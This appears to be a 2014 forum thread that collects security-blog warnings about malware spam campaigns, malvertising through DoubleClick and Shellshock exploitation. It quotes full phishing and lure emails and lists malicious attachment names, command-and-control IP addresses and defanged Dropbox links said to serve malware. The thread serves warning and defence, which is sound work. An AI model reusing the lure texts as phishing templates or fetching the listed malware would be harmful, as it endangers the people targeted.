Current Virus total detections: 3/55* . This 'Order statsus: Order confirmation: 9618161864' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a red £ sign icon, that makes you think it is a proprietary invoice instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2...is/1411991708/
... Behavioural information
TCP connections
213.186.33.19: https://www.virustotal.com/en/ip-add...9/information/
23.62.99.24: https://www.virustotal.com/en/ip-add...4/information/
213.186.33.4: https://www.virustotal.com/en/ip-add...4/information/
___
More Fake Voicemail SPAM - fake wav malware
- http://myonlinesecurity.co.uk/new-vo...e-wav-malware/
29 Sep 2014 - "'New Voicemail Message SUY-301' coming form random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
The Voice Mail message has been uploaded to the following web
address ...
You can play this Voice Mail on most computers.
Please do not reply to this message. This is an automated message which
comes from an unattended mailbox.
This information contained within this e-mail is confidential to, and is
for the exclusive use of the addressee(s).
If you are not the addressee, then any distribution, copying or use of this
e-mail is prohibited.
If received in error, please advise the sender and delete/destroy it
immediately.
We accept no liability for any loss or damage suffered by any person
arising from use of this e-mail.
... the link in the email is broken because the idiots who crafted the email messed up, the formatting. There are literally hundreds of these emails and almost all of them have a different link address and a different set of letters and numbers...
29 September 2014: voice448705888444.zip: Extracts to: voice448705888444.scr
Current Virus total detections: 1/55* . This 'New Voicemail Message SUY-301' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4...is/1412003182/
___
'Mailbox Has Exceeded The Storage Limit' - Phish ...
- https://blog.malwarebytes.org/fraud-...e-limit-phish/
Sep 29, 2014 - "Be wary of emails claiming you’ve gone over your email storage limit – users of both AOL and Outlook are reporting the following poorly written message crashing their mailbox party in the last couple of days:
“Kindly Re-Validate Your Mailbox
Your mailbox has exceeded the storage limit is 1 GB, which is defined by the administrator, are running at 99.8 gigabytes, you can not send or receive new messages until you re-validate your mailbox.
To renew the mailbox,
click link below: [removed]
Thank you!
Web mail system administrator!
WARNING! Protect your privacy. Logout when you are done and completely
exit your browser.”
The URL given on the Facebook post is already -dead- but it’s likely the people behind this have mails targeting other types of account and deploying multiple phish page links. In both examples, the scammers are using free AOL mail addresses – despite claiming to be from 'The Outlook Team' – which should raise a few red flags. AOL have confirmed the mail is a -hoax- and recipients should safely deposit it in their Trash folder..."
___
Bash Bug vulnerability
- http://www.symantec.com/connect/blog...-vulnerability
Updated: 29 Sep 2014 - "... There are limited reports of the vulnerability being used by attackers in-the-wild. Proof-of-concept scripts have already been developed by security researchers. In addition to this, a module has been created for the Metasploit Framework, which is used for penetration testing...
How a malicious command can be tacked-on to the end of a legitimate environment variable. Bash will run the malicious command first
> http://www.symantec.com/connect/site...m-600px_v2.png
... Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available..."
Table of C&C Servers:
- http://blog.trendmicro.com/trendlabs...9/Table-01.jpg
89.238.150.154: https://www.virustotal.com/en/ip-add...4/information/
108.162.197.26: https://www.virustotal.com/en/ip-add...6/information/
162.253.66.76: https://www.virustotal.com/en/ip-add...6/information/
213.5.67.223: https://www.virustotal.com/en/ip-add...3/information/
:fear: :mad:
Fake NatWest, new FAX, Delta Air SPAM
FYI...
Fake NatWest, new FAX SPAM
- http://blog.dynamoo.com/2014/09/malw...-have-new.html
30 Sep 2014 - "The daily mixed spam run has just started again, these two samples seen so far this morning:
NatWest: "You have a new Secure Message"
From: NatWest [secure.message@ natwest .com]
Date: 30 September 2014 09:58
Subject: You have a new Secure Message - file-3800
You have received a encrypted message from NatWest Customer Support
In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
Please download your ecnrypted message at ...
"You've received a new fax"
From: Fax [fax@victimdomain .com]
Date: 30 September 2014 09:57
Subject: You've received a new fax
New fax at SCAN4148711 from EPSON by https ://victimdomain .com
Scan date: Tue, 30 Sep 2014 14:27:24 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at ...
The link in the email goes through a script to ensure that you are using a Windows PC and then downloads a file document3009.zip which contains a malicious executable document3009.scr which has a VirusTotal detection rate of 3/54*. The Comodo CAMAS report and Anubis report are rather inconclusive."
* https://www.virustotal.com/en/file/1...is/1412070442/
... Behavioural information
DNS requests
maazmedia .com (69.89.22.130)
TCP connections
188.165.198.52: https://www.virustotal.com/en/ip-add...2/information/
69.89.22.130: https://www.virustotal.com/en/ip-add...0/information/
___
Fake Delta Air SPAM - word doc malware
- http://myonlinesecurity.co.uk/delta-...d-doc-malware/
30 Sep 2014 - "'Delta Air Thank you for your order' being sent to bookings@ uktservices .com and BCC copied to you pretending to come from Delta Air <login@ proche-hair .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Order Notification,
E-TICKET NUMBER / ET-98191471
SEAT / 79F/ZONE 1
DATE / TIME 2 OCTOBER, 2014, 11:15 PM
ARRIVING / Berlin
FORM OF PAYMENT / XXXXXX
TOTAL PRICE / 214.61 GBP
REF / OE.2368 ST / OK
BAG / 3PC
Your electronic ticket is attached to the letter as a scan document.
You can print your ticket.
Thank you for your attention.
Delta Air Lines.
30 September 2014: ET-17843879.zip: Extracts to: DT-ET_5859799188.exe
Current Virus total detections: 4/55* . This 'Delta Air Thank you for your order' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/3...is/1412075964/
:fear: :mad:
Fake Police 'Suspect', Invoice SPAM
FYI...
Fake Police 'Suspect' SPAM
- http://blog.dynamoo.com/2014/10/homi...tant-spam.html
1 Oct 2014 - "... the New York City police have finally tracked me down for eviscerating that spammer in Times Square.
From: ALERT@ police .uk [ALERT@ police-uk .com]
Date: 1 October 2014 08:49
Subject: Homicide Suspect - important
Bulletin Headline: HOMICIDE SUSPECT
Sending Agency: New York City Police
Sending Location: NY - New York - New York City Police
Bulletin Case#: 14-49627
Bulletin Author: BARILLAS #1264
Sending User #: 56521
APBnet Version:
The bulletin is a pdf file. To download please follow the link below ...
Weirdly, the message comes from a police .uk email address and the link goes to a driving school in Australia. And it comes from 63.234.220.114 which is an IP address in Kansas City. Perhaps the biggest anomaly is the file that is downloaded, a ZIP file called file-viewonly7213_pdf.zip which contains an executable file-viewonly7213_pdf.scr which is (as you might guess) malicious with a VirusTotal detection rate of 2/55*. The Anubis report** shows that the malware phones home to santace .com which is probably worth blocking or monitoring. Other analyses are pending. I've also seen the same payload promoted through a "You've received a new fax" spam, and no doubt there will be others during the course of the day."
* https://www.virustotal.com/en/file/5...is/1412150049/
** https://anubis.iseclab.org/?action=r...da&format=html
___
Something evil on 87.118.127.230
- http://blog.dynamoo.com/2014/10/some...118127230.html
1 Oct 2014 - "... what exploit kit this is I cannot determine, but there's something evil on 87.118.127.230 (Keyweb, Germany) which is using hijacked GoDaddy-registered subdomains to distribute crap. It's definitely worth -blocking- this IP. The source looks like some sort of malvertising, but I have incomplete data..."
87.118.127.230: https://www.virustotal.com/en/ip-add...0/information/
___
Fake 'Booking Cancellation' SPAM
- http://blog.dynamoo.com/2014/10/ukts...cellation.html
1 Oct 2014 - "... a -mass- of these purporting to be from uktservices .com ("UK Travel Services"), but in fact it is a -forgery- and does -not- come from them at all - they are -not- responsible for sending the spam and their systems have -not- been compromised.
From: email@ uktservices .com
Date: 1 October 2014 14:01
Subject: Booking Cancellation
Hello.
Your booking at 13:15 on 1st Oct 2014 has been Cancelled.
Here is a link to your updated bookings view...
All the emails are somewhat mangled, but the first link in the email (not the uktservices .com link) goes to what appears to be an exploit kit... In -all- cases, those pages forward to a malicious page at: [donotclick]37.235.56.121 :8080/njslfxqqw9. The IP of 37.235.56.121 belongs to EDIS GmbH in Austria, and I suspect it has been hacked through an insecure Joomla installation. I haven't been able to identify which exploit kit it is as it it has been hardened against analysis, but you can guarantee that this -is- malicious in some way or another..."
37.235.56.121: https://www.virustotal.com/en/ip-add...1/information/
___
More Fake Invoice SPAM
- http://myonlinesecurity.co.uk/invoic...e-pdf-malware/
1 Oct 2014 - "'Invoice 08387 from Them Digital' pretending to come from Jason Willson <jason@ themdigital .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-con...ital_email.png
There are actually about 15 different sizes and repackaged versions of this malware that I have seen so far today. All have the same zip file name but the contents inside are named differently, Some will be caught by antivirus generic detections and some won’t, so be careful & watch out. Use your eyes and intuition and don’t rely on yoiur antivirus to protect you from these types of malware
Todays Date: Them Digital Invoice 08387.pdf.zip: Extracts to: ThemDigital_Invoice_42559029506452623.pdf.exe | Current Virus total detections: 9/55**. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/6...is/1412153387/
___
Fake 'Cashbuild Copied invoices' SPAM - PDF malware
- http://myonlinesecurity.co.uk/cashbu...e-pdf-malware/
1 Oct 2014 - "'Cashbuild Copied invoices' pretending to come from billing@ cashbuild .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
get copies of invoices. We will not be able to pay them. Please send clear invoices
1 October 2014: copies_908705.zip ( 10kb): Extracts to: copies_908705.exe
Current Virus total detections: 0/55* This Cashbuild Copied invoices is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8...is/1412156828/
___
GNU bash vulns...
- http://www.securitytracker.com/id/1030890
Updated: Oct 3 2014*
Original Entry Date: Sep 24 2014
- https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-6271 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-6277 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-6278 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-7169 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-7186 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-7187 - 10.0 (HIGH)
* ... archive entries have one or more follow-up message(s)...
___
DoubleClick abused - malvertising
- https://blog.malwarebytes.org/malver...ising-attacks/
30 Sep 2014 - "Last week we uncovered a large-scale malvertising* attack involving Google’s DoubleClick and Zedo that affected many high-profile sites**... another incident where DoubleClick is part of the advertising chain has happened again... the publisher is trusting them to only allow ‘clean’ ads. Many popular sites were caught in the cross-fire including examiner . com... they can be widespread in an instant by leveraging the advertising networks’ infrastructure. Malicious ads are displayed to millions of visitors who do -not- actually need to click them to get infected:
> https://blog.malwarebytes.org/wp-con...9/overview.png
... Flash-based redirection: ad looks legit but hides a silent -redirection- to an exploit page. Once again, no user interaction is required to trigger the -redirection- and anyone running an outdated Flash plugin is at risk of getting exploited... It is the infamous CryptoWall*** (hat tip @kafeine) ransomware that encrypts your files and demands a ransom..."
* https://blog.malwarebytes.org/malver...lick-and-zedo/
** https://blog.malwarebytes.org/exploi...ael-newspaper/
*** https://www.virustotal.com/en/file/5...is/1412048718/
:mad: :fear:
Fake invoice, lawyer SPAM
FYI...
Fake Invoice SPAM - XLS malware
- http://myonlinesecurity.co.uk/invoic...e-xls-malware/
2 Oct 2014 - "'Invoice IDS107587_815' pretending to come from billing department at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-con...107587_815.png
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft excel XLS file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
___
Fake lawyer SPAM - PDF malware
- http://myonlinesecurity.co.uk/docume...e-pdf-malware/
2 Oct 2014 - "'document from lawyer' pretending to come from random names at yahoo .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... There are a multitude of similar type subjects with this one including:
document from lawyer
resend the fax
document’s from lawyer
document review
notarized document from lawyer
The document from lawyer email is very plain and simple and has a very simple 2 or 3 word content in bold: 'Document Review Lawyer' or document 'review consultant' or 'The law firm' and it attaches a file that pretends to be a copy of a fax...
2 October 2014: facsimile_page2_10.02.2014.zip: Extracts to: facsimile_page2_10.02.2014.exe
Current Virus total detections: 5/55* . This 'document from lawyer' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4...is/1412241170/
___
Fake 'Shipping' SPAM - .scr malware
- http://myonlinesecurity.co.uk/po-948...pping-malware/
2 Oct 2014 - "'PO-94864-PM Shipping' pretending to come from somebody called Leta Potts is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has 2 different versions of the text, depending on whether you read emails in full html when they can show pictures and formatting or in plain text... The email plain text version looks like:
Hi April,
PO-61814-PM is ready to ship. Attached please find the receipt and UPS tracking is below.
UPS Tracking Number: 1ZY79R600397981039
Thank you and have a wonderful afternoon.
Amy Fling
Pro Shoe Covers
503-807-1642
800-978-1786
www. ProShoeCovers .com
129 Pendleton Way, #31
Washougal, WA 98671
OMWBE Certified
Women’s Business Enterprise ...
The html version looks like:
April,
Please see attached draw. Thanks
Leta Potts
Conquest Electrical Contracting, LLC
Owner/Operator
12307 Roxie Drive, Ste. 215
Austin, TX 78729
Cell 925 487-5121
Office 925 524-2651 ...
2 October 2014: docs100214.zip - Extracts to: mydocs.scr
Current Virus total detections: 0/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a icon of a blue folder with a silver key instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f...is/1412253608/
- http://www.ehow.com/info_8510148_scr-file.html
"... Viruses and other malicious software may be installed in SCR files, as the file type is -executable- or capable of installing code..."
___
Fake insurance photos SPAM - malware
- http://myonlinesecurity.co.uk/fwd-ph...mpany-malware/
2 Oct 2014 - "'Fwd: Photos from the insurance company' coming from random names ands email addresses, most pretending to come from somebody @ntlworld .com is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email has a totally -blank- body with just the attachment named photo1.zip and subject of Fwd: Photos from the insurance company . It is exactly the -same- malware as in today’s document from lawyer* – fake PDF malware but instead of a fake fax it unzips to a pif file ( windows shortcut). This Fwd: Photos from the insurance company is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/docume...e-pdf-malware/
___
Fake 'eDocument' SPAM – PDF malware
- http://myonlinesecurity.co.uk/santan...e-pdf-malware/
2 Oct 2014 - "'New eDocument arrived' pretending to come from e-Documents@ santander .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-con..._statement.png
... the malware is the -same- as in today’s 'document from lawyer'* – fake PDF malware. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/docume...e-pdf-malware/
___
O/S Market Share - Sep 2014:
- http://www.netmarketshare.com/operat...10&qpcustomd=0
['Still more XP users than Vista, Win8, and Win8.1 combined]
___
Fake invoice SPAM
- http://blog.mxlab.eu/2014/10/02/fake...ntains-trojan/
2 Oct 2014 - "... intercepted 2 trojan distribution campaigns by email.
Unpaid invoice notification
The first campaign has the following details:
[IMPORTANT] Unpaid invoice notification
[IMPORTANT] Latest letter on invoice overdue
Final letter before commencing legal action
Latest invoice
Latest letter on invoice overdue
Recent invoice
This email is sent from a spoofed addresses and has the following body below. In the email, the amount that is due is specified in the GBP currency but no company or service is included in the message...
We are writing to you about fact, despite previous reminders, there remains an outstanding amount of GBP 234.60 in respect of the invoice(s) contained in this email . This was due for payment on 26 September, 2014.
Our credit terms stipulate full payment within 3 days and this amount is now 14 days overdue.The total amount due from you is therefore GBP 340.51
If the full amount of the sum outstanding, as set above, is not paid within 7 days of the date of this email, we shall begin legal action, without warning, for a court order requiring payment. We may also commence insolvency proceedings. Legal proceedings can affect any credit rating. The costs of legal proceedings and any other amounts which the court orders must also be paid in addition to the debt.
This letter is being sent to you in accordance with the Practice Direction on Pre-Action Conduct (the PDPAC) contained in the Civil Procedure Rules, The court has the power to sanction your continuing failure to respond.
You can find the original invoice in attachment below...
The attached ZIP file name is in the format like Copy4167506/9332.zip and contains the 89 kB large file Invoice_815992488951.xls.scr. The trojan is known as HEUR/QVM20.1.Malware.Gen. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total*...
* https://www.virustotal.com/en/file/e...is/1412243475/
The 2nd campaign has the following details: This email is sent from the spoofed addresses like “Harrison Andrews , Billing Dept” <049aaa@***** .pl> and has the following body:
This email contains an invoice ID:P198150_874 file attachment.
Yours faithfully,
Harrison Andrews , Department CCD
The attached ZIP file name is in the format like P198150_874.zip and contains the 89 kB large file Invoice_33618247236242544.xls.scr. The trojan is known as HEUR/QVM20.1.Malware.Gen. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total**..."
** https://www.virustotal.com/en/file/3...cefa/analysis/
:mad: :fear:
Fake Adobe, Personal reply, Transactions Report, Dropbox malSPAM
FYI...
Fake 'Transactions Report' SPAM - fake PDF malware
- http://myonlinesecurity.co.uk/alert-...e-pdf-malware/
3 Oct 2014 - "'Alert Transactions Report by users from 2014-09-28 to 2014-09-28' pretending to come from Tech Server is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email is very terse and basic with a simple one line content:
Your requested report is attached here...
3 October 2014: transact_store.zip: Extracts to: transact_e5ebfdsd621.exe
Current Virus total detections: 2/54* . This is the same malware that is being dropped by today’s version of http://myonlinesecurity.co.uk/new-photo-malware/
This 'Alert Transactions Report by users from 2014-09-28 to 2014-09-28' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e...is/1412331282/
___
Fake 'shopping' malSPAM spreads via Dropbox
- http://blog.dynamoo.com/2014/10/than...-us-today.html
3 Oct 2014 - "This spam email leads to malware hosted on Dropbox:
From: pghaa@ pghaa .org
To: victim@ victimdomain .com
Date: 3 October 2014 11:43
Subject: victim@ victimdomain .com
Thanks for shopping with us today! Your purchase will be processed shortly.
ORDER DETAILS
Purchase Number: CTV188614791
Purchase Date: 7:38 2-Oct-2014
Customer Email: victim@ victimdomain .com
Amount: 4580 US Dollars
Open your payment details
Please click the link provided above to get more details about your order...
In this case the download location is https ://www .dropbox .com/s/7n4ib0ysqnzr4un/Payment%20Details_52375.zip?dl=1 although it is likely that there are others. The download file is Payment Details_52375.zip containing a malicious executable PAYMENT DETAILS.PDF .scr_56453.exe which has a VirusTotal detection rate of 5/55*. At the moment, automated analysis tools are inconclusive as to what it does.
UPDATE: it is also being distributed via
[donotclick]
https ://www .dropbox .com/s/9an3ggp98xu7ql5/Transaction_85523.zip?dl=1
https ://www .dropbox .com/s/8uoheamseo98nse/Information_J90Z4.zip?dl=1"
* https://www.virustotal.com/en-gb/fil...is/1412334793/
___
Fake 'Personal reply' SPAM - Word doc malware
- http://myonlinesecurity.co.uk/re-per...d-doc-malware/
3 Oct 2014 - "'Re: Personal reply id 509359' coming from random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-con...fice_macro.png
3October 2014: Reply02.doc . Current Virus total detections: 4/55*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day..."
* https://www.virustotal.com/en/file/7...is/1412314059/
___
Fake 'Adobe invoice' SPAM...
- http://blog.mxlab.eu/2014/10/02/mali...rvice-invoice/
Oct 2, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Adobe Invoice”. This email is send from the spoofed address “Adobe Billing <billing@ adobe .com>” and has the following body:
Dear Customer,
Thank you for signing up for Adobe Creative Cloud Service.
Attached is your copy of the invoice.
Thank you for your purchase.
Thank you,
The Adobe Team
Adobe Creative Cloud Service
Screenshot: http://img.blog.mxlab.eu/2014/20141002_adobe.gif
The attached file is 42 kB large and has the name Adobe Invoice.doc. The trojan is known as W97M.Dropper.F, VBA/TrojanDownloader.Agent.AZ, MSOffice/Agent!tr or Win32.Trojan.Macro.Dxmz. At the time of writing, 4 of the 55 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/5...f3f5/analysis/
___
Shellshock in-the-wild - drops malware
- http://community.websense.com/blogs/...erability.aspx
1 Oct 2014 - "Since the Shellshock vulnerability became public knowledge... vulnerability being exploited in the wild to drop malware...
Backdoors and Bot Nets: The observed malware found to be exploiting the Shellshock vulnerability has been dropped by various command and control (C&C) servers... The malware has the following capabilities:
- A Linux backdoor, capable of DDoS attacks, brute force attacks on passwords, and receiving commands to execute from its C&C server.
- A Perl IRC bot, typically capable of DDoS attacks and spreading itself by looking for exploitable servers using various vulnerabilities, such as remote file inclusion exploits.
The malware has been seen to be downloaded to a compromised machine by exploiting the Shellshock vulnerability and invoking commands such as "curl" or "wget," and then executing the malicious payload. To date, we have seen -4- variants of the Linux backdoor and several versions of the Perl-based IRC bot.
Popularity Since Vulnerability Disclosure: The following domains and IPs have been found to be used as command & control (C&C) points for this campaign (amongst others):
208.118.61.44: https://www.virustotal.com/en/ip-add...4/information/
27.19.159.224: https://www.virustotal.com/en/ip-add...4/information/
89.238.150.154: https://www.virustotal.com/en/ip-add...4/information/
212.227.251.139: https://www.virustotal.com/en/ip-add...9/information/
... We have seen C&C traffic to these IPs in the last 2 -months- showing that they have been used for malicious and bot network campaigns -prior- to the Shellshock vulnerability disclosure. In fact, going back as far as 2012, we see that one such C&C was used in a Point-of-Sale malware campaign known as 'vSkimmer'. More recently, we have observed it serving up an IRC bot... Experience has taught us that as cyber-criminals zoom in on the vulnerable code branch, -additional- vulnerabilities are likely to surface..."
- http://atlas.arbor.net/briefs/index#1914014714
Extreme Severity
3 Oct 2014
:fear::fear: :mad: